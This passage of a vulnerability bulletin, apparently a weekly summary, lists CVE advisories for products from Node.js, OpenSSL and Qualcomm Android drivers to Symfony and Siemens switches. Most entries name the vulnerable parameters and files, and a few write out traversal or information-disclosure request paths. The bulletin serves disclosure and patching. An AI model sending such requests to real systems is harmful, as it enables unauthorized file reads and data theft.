All versions of Node.js 9.x and 10.x are vulnerable and the severity is HIGH. An attacker can cause a denial of service (DoS) by causing a node process which provides an http server supporting TLS server to crash. This can be accomplished by sending duplicate/unexpected messages during the handshake. This vulnerability has been addressed by updating the TLS implementation.2018-06-13not yet calculatedCVE-2018-7162
BID
CONFIRM
nodejs -- node.js
 
Node.js versions 9.7.0 and later and 10.x are vulnerable and the severity is MEDIUM. A bug introduced in 9.7.0 increases the memory consumed when reading from the network into JavaScript using the net.Socket object directly as a stream. An attacker could use this cause a denial of service by sending tiny chunks of data in short succession. This vulnerability was restored by reverting to the prior behaviour.2018-06-13not yet calculatedCVE-2018-7164
BID
CONFIRM
norton -- app_lock
 
Norton App Lock prior to version 1.3.0.329 can be susceptible to a bypass exploit. In this type of circumstance, the exploit can allow the user to circumvent the app to prevent it from locking the device, thereby allowing the individual to gain device access.2018-06-13not yet calculatedCVE-2018-5242
BID
CONFIRM
octopus -- deploy
 
In Octopus Deploy version 2018.5.1 to 2018.5.7, a user with Task View is able to view a password for a Service Fabric Cluster, when the Service Fabric Cluster target is configured in Azure Active Directory security mode and a deployment is executed with OctopusPrintVariables set to True. This is fixed in 2018.6.0.2018-06-11not yet calculatedCVE-2018-12089
CONFIRM
oecms -- oecms
 
A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.2018-06-11not yet calculatedCVE-2018-12095
MISC
EXPLOIT-DB
opc_foundation -- local_discovery_server
 
OPC Foundation Local Discovery Server (LDS) 1.03.370 required a security update to resolve multiple vulnerabilities that allow attackers to trigger a crash by placing invalid data into the configuration file. This vulnerability requires an attacker with access to the file system where the configuration file is stored; however, if the configuration file is altered the LDS will be unavailable until it is repaired.2018-06-13not yet calculatedCVE-2017-17443
CONFIRM
opc_foundation -- local_discovery_server
 
The OPC Foundation Local Discovery Server (LDS) before 1.03.367 is installed as a Windows Service without adding double quotes around the opcualds.exe executable path, which might allow local users to gain privileges.2018-06-13not yet calculatedCVE-2017-11672
CONFIRM
opc_foundation -- opc_ua_.net_sample_applications
 
An issue was discovered in OPC UA .NET Standard Stack and Sample Code before GitHub commit 2018-04-12, and OPC UA .NET Legacy Stack and Sample Code before GitHub commit 2018-03-13. A vulnerability in OPC UA applications can allow a remote attacker to determine a Server's private key by sending carefully constructed bad UserIdentityTokens as part of an oracle attack.2018-06-13not yet calculatedCVE-2018-7559
CONFIRM
CONFIRM
CONFIRM
opc_foundation -- opc_ua_.net_sample_applications
 
Unsigned versions of the DLLs distributed by the OPC Foundation may be replaced with malicious code.2018-06-14not yet calculatedCVE-2017-12070
CONFIRM
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote authenticated users to obtain sensitive information about external guest users via vectors related to the "groups" and "users" APIs.2018-06-15not yet calculatedCVE-2018-5751
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote attackers to conduct server-side request forgery (SSRF) attacks via vectors involving non-decimal representations of IP addresses and special IPv6 related addresses.2018-06-15not yet calculatedCVE-2018-5752
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev35, 7.8.x before 7.8.2-rev38, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev19 allows remote authenticated users to save arbitrary user attributes by leveraging improper privilege management.2018-06-15not yet calculatedCVE-2017-17062
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The frontend component in Open-Xchange OX App Suite before 7.6.3-rev31, 7.8.x before 7.8.2-rev31, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev20 allows remote attackers to spoof the origin of e-mails via unicode characters in the "personal part" of a (1) From or (2) Sender address.2018-06-15not yet calculatedCVE-2018-5753
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
Absolute path traversal vulnerability in the readerengine component in Open-Xchange OX App Suite before 7.6.3-rev3, 7.8.x before 7.8.2-rev4, 7.8.3 before 7.8.3-rev5, and 7.8.4 before 7.8.4-rev4 allows remote attackers to read arbitrary files via a full pathname in a formula in a spreadsheet.2018-06-15not yet calculatedCVE-2018-5755
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
Cross-site scripting (XSS) vulnerability in the office-web component in Open-Xchange OX App Suite before 7.8.3-rev12 and 7.8.4 before 7.8.4-rev9 allows remote attackers to inject arbitrary web script or HTML via a crafted presentation file, related to copying content to the clipboard.2018-06-15not yet calculatedCVE-2018-5754
MISC
FULLDISC
EXPLOIT-DB
open-xchange -- ox_app_suite
 
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 does not properly check for folder-to-object association, which allows remote authenticated users to delete arbitrary tasks via the task id in a delete action to api/tasks.2018-06-15not yet calculatedCVE-2018-5756
MISC
FULLDISC
EXPLOIT-DB

openshift -- openshift_enterprise

routing before version 3.10 is vulnerable to an improper input validation of the Openshift Routing configuration which can cause an entire shard to be brought down. A malicious user can use this vulnerability to cause a Denial of Service attack for other users of the router shard.2018-06-12not yet calculatedCVE-2018-1070
CONFIRM
openshift -- openshift_enterprise
 
Openshift Enterprise source-to-image before version 1.1.10 is vulnerable to an improper validation of user input. An attacker who could trick a user into using the command to copy files locally, from a pod, could override files outside of the target directory of the command.2018-06-12not yet calculatedCVE-2018-1103
CONFIRM
openshift-ansible -- openshift-ansible
 
openshift-ansible before versions 3.9.23, 3.7.46 deploys a misconfigured etcd file that causes the SSL client certificate authentication to be disabled. Quotations around the values of ETCD_CLIENT_CERT_AUTH and ETCD_PEER_CLIENT_CERT_AUTH in etcd.conf result in etcd being configured to allow remote users to connect without any authentication if they can access the etcd server bound to the network on the master nodes. An attacker could use this flaw to read and modify all the data about the Openshift cluster in the etcd datastore, potentially adding another compute node, or bringing down the entire cluster.2018-06-15not yet calculatedCVE-2018-1085
CONFIRM
openssl -- openssl
 
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime resulting in a hang until the client has finished. This could be exploited in a Denial Of Service attack. Fixed in OpenSSL 1.1.0i-dev (Affected 1.1.0-1.1.0h). Fixed in OpenSSL 1.0.2p-dev (Affected 1.0.2-1.0.2o).2018-06-12not yet calculatedCVE-2018-0732
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
ovirt-engine -- ovirt-engine
 
ovirt-engine up to version 4.2.3 is vulnerable to an unfiltered password when choosing manual db provisioning. When engine-setup was run and one chooses to provision the database manually or connect to a remote database, the password input was logged in cleartext during the verification step. Sharing the provisioning log might inadvertently leak database passwords.2018-06-12not yet calculatedCVE-2018-1075
CONFIRM
CONFIRM
pale_moon -- pale_moon
 
A use-after-free vulnerability exists in DOMProxyHandler::EnsureExpandoObject in Pale Moon before 27.9.3.2018-06-13not yet calculatedCVE-2018-12292
CONFIRM
phpok -- phpok
 
PHPOK 4.9.032 has an arbitrary file deletion vulnerability in the delfile_f function in framework/admin/tpl_control.php.2018-06-15not yet calculatedCVE-2018-12492
MISC
phpok -- phpok
 
PHPOK 4.9.032 has an arbitrary file upload vulnerability in the import_f function in framework/admin/modulec_control.php, as demonstrated by uploading a .php file within a .php.zip archive, a similar issue to CVE-2018-8944.2018-06-15not yet calculatedCVE-2018-12491
MISC
phpscriptsmall.com -- schools_alert_management_script
 
Arbitrary File Deletion exists in PHP Scripts Mall Schools Alert Management Script via the img parameter in delete_img.php by using directory traversal.2018-06-08not yet calculatedCVE-2018-12053
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
Multiple SQL Injections exist in PHP Scripts Mall Schools Alert Management Script via crafted POST data in contact_us.php, faq.php, about.php, photo_gallery.php, privacy.php, and so on.2018-06-08not yet calculatedCVE-2018-12055
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php.2018-06-08not yet calculatedCVE-2018-12052
MISC
EXPLOIT-DB
phpscriptsmall.com -- schools_alert_management_script
 
Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.2018-06-08not yet calculatedCVE-2018-12054
MISC
EXPLOIT-DB
pivotal_spring -- spring-flex
 
The Java implementations of AMF3 deserializers in Pivotal/Spring Spring-flex derive class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.2018-06-11not yet calculatedCVE-2017-3203
MISC
MISC
CERT-VN
BID
point-to-point_protocol_daemon -- point-to-point_protocol_daemonImproper input validation together with an integer overflow in the EAP-TLS protocol implementation in PPPD may cause a crash, information disclosure, or authentication bypass. This implementation is distributed as a patch for PPPD 0.91, and includes the affected eap.c and eap-tls.c files. Configurations that use the `refuse-app` option are unaffected.2018-06-14not yet calculatedCVE-2018-11574
MLIST
portfoliocms -- portfoliocms
 
portfolioCMS 1.0.5 allows upload of arbitrary .php files via the admin/portfolio.php?newpage=true URI.2018-06-13not yet calculatedCVE-2018-12263
MISC
portfoliocms -- portfoliocms
 
portfolioCMS 1.0.5 has SQL Injection via the admin/portfolio.php preview parameter.2018-06-11not yet calculatedCVE-2018-12110
MISC
procps -- procps
 
procps-ng, procps is vulnerable to a process hiding through race condition. Since the kernel's proc_pid_readdir() returns PID entries in ascending numeric order, a process occupying a high PID can use inotify events to determine when the process list is being scanned, and fork/exec to obtain a lower PID, thus avoiding enumeration. An unprivileged attacker can hide a process from procps-ng's utilities by exploiting a race condition in reading /proc/PID entries. This vulnerability affects procps and procps-ng up to version 3.3.15, newer versions might be affected also.2018-06-13not yet calculatedCVE-2018-1121
MLIST
BID
CONFIRM
EXPLOIT-DB
MISC
public_knowledge_project -- open_journal_system
 
Cross-site scripting (XSS) vulnerability in Public Knowledge Project (PKP) Open Journal System (OJS) 3.X (before OJS 3.1.1-2) allows remote attackers to inject arbitrary web script or HTML via the templates/frontend/pages/search.tpl $authors parameter (aka the By Author field).2018-06-12not yet calculatedCVE-2018-12229
MISC
MISC
publiccms -- publiccms
 
An issue discovered in PublicCMS V4.0.20180210. There is a "Directory Traversal" and "Arbitrary file read" vulnerability via an admin/cmsWebFile/list.html?path=../ URI.2018-06-15not yet calculatedCVE-2018-12493
MISC
publiccms -- publiccms
 
An issue discovered in PublicCMS V4.0.20180210. There is a "Directory Traversal" and "Arbitrary file read" vulnerability via an admin/cmsTemplate/content.html?path=../ URI.2018-06-15not yet calculatedCVE-2018-12494
MISC
puppet -- puppet_agent
 
In Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, Puppet Agent 5.5.x prior to 5.5.2, Facter on Windows is vulnerable to a DLL preloading attack, which could lead to a privilege escalation.2018-06-11not yet calculatedCVE-2018-6514
CONFIRM
puppet -- puppet_agent
 
Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, and Puppet Agent 5.5.x prior to 5.5.2 on Windows only, with a specially crafted configuration file an attacker could get pxp-agent to load arbitrary code with privilege escalation.2018-06-11not yet calculatedCVE-2018-6515
CONFIRM
puppet -- puppet_enterprise_and_agent
 
Puppet Enterprise 2016.4.x prior to 2016.4.12, Puppet Enterprise 2017.3.x prior to 2017.3.7, Puppet Enterprise 2018.1.x prior to 2018.1.1, Puppet Agent 1.10.x prior to 1.10.13, Puppet Agent 5.3.x prior to 5.3.7, and Puppet Agent 5.5.x prior to 5.5.2, were vulnerable to an attack where an unprivileged user on Windows agents could write custom facts that can escalate privileges on the next puppet run. This was possible through the loading of shared libraries from untrusted paths.2018-06-11not yet calculatedCVE-2018-6513
CONFIRM
puppet -- puppet_enterprise_client_tools
 
On Windows only, with a specifically crafted configuration file an attacker could get Puppet PE client tools (aka pe-client-tools) 16.4.x prior to 16.4.6, 17.3.x prior to 17.3.6, and 18.1.x prior to 18.1.2 to load arbitrary code with privilege escalation.2018-06-14not yet calculatedCVE-2018-6516
CONFIRM
puppet -- puppet_enterprise
 
The previous version of Puppet Enterprise 2018.1 is vulnerable to unsafe code execution when upgrading pe-razor-server. Affected releases are Puppet Enterprise: 2018.1.x versions prior to 2018.1.1 and razor-server and pe-razor-server prior to 1.9.0.0.2018-06-11not yet calculatedCVE-2018-6512
CONFIRM
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET user parameter.2018-06-12not yet calculatedCVE-2017-18291
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET sort_direction parameter.2018-06-12not yet calculatedCVE-2017-18290
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exist in ladder/stats.php via the GET type parameter.2018-06-12not yet calculatedCVE-2017-18289
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the GET game parameter.2018-06-12not yet calculatedCVE-2017-18288
MISC
pvpgn -- stats
 
An issue was discovered in PvPGN Stats 2.4.6. SQL Injection exists in ladder/stats.php via the POST user_search parameter.2018-06-12not yet calculatedCVE-2017-18287
MISC
qemu -- qemu
 
m_cat in slirp/mbuf.c in Qemu has a heap-based buffer overflow via incoming fragmented datagrams.2018-06-13not yet calculatedCVE-2018-11806
MLIST
BID
CONFIRM
MLIST
MISC
qualcomm -- androidIf userspace provides a too-large WPA RSN IE length in wlan_hdd_cfg80211_set_ie(), a buffer overflow occurs in all Android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel.2018-06-15not yet calculatedCVE-2018-5863
MISC
qualcomm -- androidThe VMware AirWatch Agent for Android prior to 8.2 and AirWatch Agent for Windows Mobile prior to 6.5.2 contain a remote code execution vulnerability in real time File Manager capabilities. This vulnerability may allow for unauthorized creation and execution of files in the Agent sandbox and other publicly accessible directories such as those on the SD card by a malicious administrator.2018-06-11not yet calculatedCVE-2018-6968
BID
SECTRACK
CONFIRM
qualcomm -- androidThe value of fix_param->num_chans is received from firmware and if it is too large, an integer overflow can occur in wma_radio_chan_stats_event_handler() for the derived length len leading to a subsequent buffer overflow in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2017-15854
MISC
qualcomm -- androidimproper validation of array index in WiFi driver function sapInterferenceRssiCount() leads to array out-of-bounds access in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-3576
MISC
qualcomm -- androidA stack-based buffer overflow can occur in fastboot from all Android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel.2018-06-15not yet calculatedCVE-2018-5854
MISC
qualcomm -- androidWhile processing a DSP buffer in an audio driver's event handler, an index of a buffer is not checked before accessing the buffer in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-3572
MISC
qualcomm -- androidAn arbitrary address write can occur if a compromised WLAN firmware sends incorrect data to WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-5842
MISC
qualcomm -- androidBuffer overflow can occur due to improper input validation in multiple WMA event handler functions in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-3582
MISC
qualcomm -- androidIn the video driver function set_output_buffers(), binfo can be accessed after being freed in a failure scenario in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-5844
MISC
qualcomm -- android
 
In the camera driver, an out-of-bounds access can occur due to an error in copying region params from user space in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2017-15857
MISC
qualcomm -- android
 
In the WCD CPE codec, a Use After Free condition can occur in all Android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel.2018-06-15not yet calculatedCVE-2018-5857
MISC
qualcomm -- android
 
Early or late retirement of rotation requests can result in a Use After Free condition in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-5847
MISC
qualcomm -- android
 
Buffer might get used after it gets freed due to unlocking the mutex before freeing the buffer in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2017-15842
MISC
qualcomm -- android
 
In the WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, a buffer overwrite can occur if the vdev_id received from firmware is larger than max_bssid.2018-06-12not yet calculatedCVE-2018-3581
MISC
qualcomm -- android
 
In the function wma_pdev_div_info_evt_handler() in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, there is no upper bound check on the value event->num_chains_valid received from firmware which can lead to a buffer overwrite of the fixed size chain_rssi_result structure.2018-06-12not yet calculatedCVE-2018-5843
MISC
qualcomm -- android
 
User process can perform the kernel DOS in ashmem when doing cache maintenance operation in all Android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel.2018-06-15not yet calculatedCVE-2017-18169
MISC
qualcomm -- android
 
In the MDSS driver in all Android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel, a data structure may be used without being initialized correctly.2018-06-15not yet calculatedCVE-2018-5860
MISC
qualcomm -- android
 
In the KGSL driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, a Use After Free condition can occur when printing information about sparse memory allocations2018-06-12not yet calculatedCVE-2018-3571
MISC
qualcomm -- android
 
Due to a race condition in the QTEECOM driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, when more than one HLOS client loads the same TA, a Use After Free condition can occur.2018-06-12not yet calculatedCVE-2018-5849
MISC
qualcomm -- android
 
In wma_ndp_end_response_event_handler(), the variable len_end_rsp is a uint32 which can be overflowed if the value of variable "event->num_ndp_end_rsp_per_ndi_list" is very large which can then lead to a heap overwrite of the heap object end_rsp in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2017-18070
MISC
qualcomm -- android
 
In the WLAN driver in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel, event->num_entries_in_page is a value received from firmware that is not properly validated which can lead to a buffer over-read2018-06-12not yet calculatedCVE-2018-3579
MISC
qualcomm -- android
 
Due to a race condition in a bus driver, a double free in msm_bus_floor_vote_context() can potentially occur in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2017-15843
MISC
qualcomm -- android
 
Buffer over flow can occur while processing a HTT_T2H_MSG_TYPE_TX_COMPL_IND message with an out-of-range num_msdus value in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-5851
MISC
qualcomm -- android
 
In the function wmi_set_ie(), the length validation code does not handle unsigned integer overflow properly. As a result, a large value of the 'ie_len' argument can cause a buffer overflow in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel.2018-06-12not yet calculatedCVE-2018-5848
MISC
qualcomm -- android
 
The Olive Tree Ftp Server application 1.32 for Android has a "Sensitive Data on the Clipboard" vulnerability, as demonstrated by reading the "User password" field with the Drozer post.capture.clipboard module.2018-06-15not yet calculatedCVE-2018-12481
MISC
radare -- radare2
 
There is a use after free in radare2 2.6.0 in r_anal_bb_free() in libr/anal/bb.c via a crafted Java binary file.2018-06-13not yet calculatedCVE-2018-12320
MISC
MISC
radare -- radare2
 
There is a heap out of bounds read in radare2 2.6.0 in java_switch_op() in libr/anal/p/anal_java.c via a crafted Java binary file.2018-06-13not yet calculatedCVE-2018-12321
MISC
MISC
radare -- radare2
 
There is a heap out of bounds read in radare2 2.6.0 in _6502_op() in libr/anal/p/anal_6502.c via a crafted iNES ROM binary file.2018-06-13not yet calculatedCVE-2018-12322
MISC
MISC
redis -- redis
 
Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream.2018-06-16not yet calculatedCVE-2018-12453
MISC
MISC
s3ql -- s3ql
 
S3QL before 2.27 mishandles checksumming, and consequently allows replay attacks in which an attacker who controls the backend can present old versions of the filesystem metadata database as up-to-date, temporarily inject zero-valued bytes into files, or temporarily hide parts of files. This is related to the checksum_basic_mapping function.2018-06-10not yet calculatedCVE-2018-12088
CONFIRM
CONFIRM
CONFIRM
safensec -- softcontrol/safensoft
 
Improper restriction of write operations within the bounds of a memory buffer in snscore.sys in SoftControl/SafenSoft SysWatch, SoftControl/SafenSoft TPSecure, SoftControl/SafenSoft Enterprise Suite before version 4.4.1 allows local users to cause a denial of service (BSOD) or modify kernel-mode memory via loading of a forged DLL into an user-mode process.2018-06-12not yet calculatedCVE-2018-5718
CONFIRM
samsung -- web_viewer_for_samsung_dvr
 
Smart Viewer in Samsung Web Viewer for Samsung DVR is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.2018-06-14not yet calculatedCVE-2018-11689
BUGTRAQ
sap -- hana_backup_service
 
Under certain conditions, SAP Business One, 9.2, 9.3, for SAP HANA backup service allows an attacker to access information which would otherwise be restricted.2018-06-12not yet calculatedCVE-2018-2425
BID
MISC
CONFIRM
sap -- multiple_products
 
Under certain conditions SAP UI5 Handler allows an attacker to access information which would otherwise be restricted. Software components affected are: SAP Infrastructure 1.0, SAP UI 7.4, 7.5, 7.51, 7.52 and version 2.0 of SAP UI for SAP NetWeaver 7.00.2018-06-12not yet calculatedCVE-2018-2428
BID
MISC
CONFIRM
sap -- multiple_products
 
SAP UI5 did not validate user input before adding it to the DOM structure. This may lead to malicious user-provided JavaScript code being added to the DOM that could steal user information. Software components affected are: SAP Hana Database 1.00, 2.00; SAP UI5 1.00; SAP UI5 (Java) 7.30, 7.31, 7.40, 7,50; SAP UI 7.40, 7.50, 7.51, 7.52, and version 2.0 of SAP UI for SAP NetWeaver 7.002018-06-12not yet calculatedCVE-2018-2424
BID
MISC
CONFIRM
seacms -- seacms
 
SeaCMS V6.61 has XSS via the site name parameter on an adm1n/admin_config.php page (aka a system management page).2018-06-14not yet calculatedCVE-2018-12431
MISC
siemens -- scalance_switches
 
A vulnerability has been identified in SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X300 (All versions). A remote, authenticated attacker with access to the configuration web server could be able to store script code on the web site, if the HRP redundancy option is set. This code could be executed in the web browser of victims visiting this web site (XSS), affecting its confidentiality, integrity and availability. User interaction is required for successful exploitation, as the user needs to visit the manipulated web site.2018-06-14not yet calculatedCVE-2018-4842
CONFIRM
siemens -- scalance_switches
 
A vulnerability has been identified in SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X300 (All versions). The integrated configuration web server of the affected Scalance X Switches could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. The user must be logged into the web interface in order for the exploitation to succeed.2018-06-14not yet calculatedCVE-2018-4848
CONFIRM
siemens -- scalance_switches
 
A vulnerability has been identified in RFID 181-EIP (All versions), RUGGEDCOM WiMAX (V4.4 and V4.5), SCALANCE X-200 (All versions < V5.2.3), SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X-204RNA (All versions), SCALANCE X-300 (All versions), SCALANCE X408 (All versions), SCALANCE X414 (All versions), SIMATIC RF182C (All versions). Unprivileged remote attackers located in the same local network segment (OSI Layer 2) could gain remote code execution on the affected products by sending a specially crafted DHCP response to a client's DHCP request.2018-06-14not yet calculatedCVE-2018-4833
CONFIRM
simple_password_store -- simple_password_store
 
An issue was discovered in password-store.sh in pass in Simple Password Store 1.7.x before 1.7.2. The signature verification routine parses the output of GnuPG with an incomplete regular expression, which allows remote attackers to spoof file signatures on configuration files and extension scripts. Modifying the configuration file allows the attacker to inject additional encryption keys under their control, thereby disclosing passwords to the attacker. Modifying the extension scripts allows the attacker arbitrary code execution.2018-06-14not yet calculatedCVE-2018-12356
MISC
MISC
MISC
sonatype -- nexus_repository_manager
 
Sonatype Nexus Repository Manager before 3.12.0 has XSS in multiple areas in the Administration UI.2018-06-11not yet calculatedCVE-2018-12100
CONFIRM
CONFIRM
CONFIRM
splunk -- splunk
 
Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.2018-06-08not yet calculatedCVE-2018-11409
MISC
EXPLOIT-DB
suse -- linux_enterprise
 
Missing escaping of ESSID values in sysconfig of SUSE Linux Enterprise allows attackers controlling an access point to cause execute arbitrary code. Affected releases are sysconfig prior to 0.83.7-2.1.2018-06-12not yet calculatedCVE-2011-4182
CONFIRM
CONFIRM
suse -- open-build-serviceA vulnerability in open build service allows remote attackers to gain access to source files even though source access is disabled. Affected releases are SUSE open build service up to and including version 2.1.15 (for 2.1) and before version 2.3.2018-06-11not yet calculatedCVE-2011-4181
CONFIRM
CONFIRM
suse -- open-build-service
 
A vulnerability in open build service allows remote attackers to upload arbitrary RPM files. Affected releases are SUSE open build service prior to 2.1.16.2018-06-13not yet calculatedCVE-2011-4183
CONFIRM
CONFIRM
symfony -- symfony
 
The security handlers in the Security component in Symfony in 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11 have an Open redirect vulnerability when security.http_utils is inlined by a container. NOTE: this issue exists because of an incomplete fix for CVE-2017-16652.2018-06-13not yet calculatedCVE-2018-11408
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in the Ldap component in Symfony 2.8.x before 2.8.37, 3.3.x before 3.3.17, 3.4.x before 3.4.7, and 4.0.x before 4.0.7. It allows remote attackers to bypass authentication by logging in with a "null" password and valid username, which triggers an unauthenticated bind. NOTE: this issue exists because of an incomplete fix for CVE-2016-2403.2018-06-13not yet calculatedCVE-2018-11407
CONFIRM
symfony -- symfony
 
An issue was discovered in the Security component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. A session fixation vulnerability within the "Guard" login feature may allow an attacker to impersonate a victim towards the web application if the session id value was previously known to the attacker.2018-06-13not yet calculatedCVE-2018-11385
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in the HttpFoundation component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. The PDOSessionHandler class allows storing sessions on a PDO connection. Under some configurations and with a well-crafted payload, it was possible to do a denial of service on a Symfony application without too much resources.2018-06-13not yet calculatedCVE-2018-11386
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in Symfony 2.7.x before 2.7.38, 2.8.x before 2.8.31, 3.2.x before 3.2.14, and 3.3.x before 3.3.13. DefaultAuthenticationSuccessHandler or DefaultAuthenticationFailureHandler takes the content of the _target_path parameter and generates a redirect response, but no check is performed on the path, which could be an absolute URL to an external domain. This Open redirect vulnerability can be exploited for example to mount effective phishing attacks.2018-06-13not yet calculatedCVE-2017-16652
CONFIRM
symfony -- symfony
 
An issue was discovered in the Security component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. By default, a user's session is invalidated when the user is logged out. This behavior can be disabled through the invalidate_session option. In this case, CSRF tokens were not erased during logout which allowed for CSRF token fixation.2018-06-13not yet calculatedCVE-2018-11406
FEDORA
FEDORA
FEDORA
CONFIRM
synology -- calendar
 
Improper authorization vulnerability in SYNO.Cal.Event in Calendar before 2.1.2-0511 allows remote authenticated users to create arbitrary events via the (1) cal_id or (2) original_cal_id parameter.2018-06-14not yet calculatedCVE-2018-8927
CONFIRM
tenable -- western_digital_tv_media_player_and_tv_live_hub
 
The web server on Western Digital TV Media Player 1.03.07 and TV Live Hub 3.12.13 allow unauthenticated remote attackers to execute arbitrary code or cause denial of service via crafted HTTP requests to toServerValue.cgi.2018-06-12not yet calculatedCVE-2018-1151
MISC
tibco_software -- tibco_administrator
 
The TIBCO Administrator server component of of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, and TIBCO Administrator - Enterprise Edition for z/Linux contains multiple vulnerabilities wherein a malicious user could theoretically perform cross-site scripting (XSS) attacks by way of manipulating artifacts prior to uploading them. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions up to and including 5.10.0, and TIBCO Administrator - Enterprise Edition for z/Linux: versions up to and including 5.9.1.2018-06-13not yet calculatedCVE-2018-5432
BID
CONFIRM
tibco_software -- tibco_administrator
 
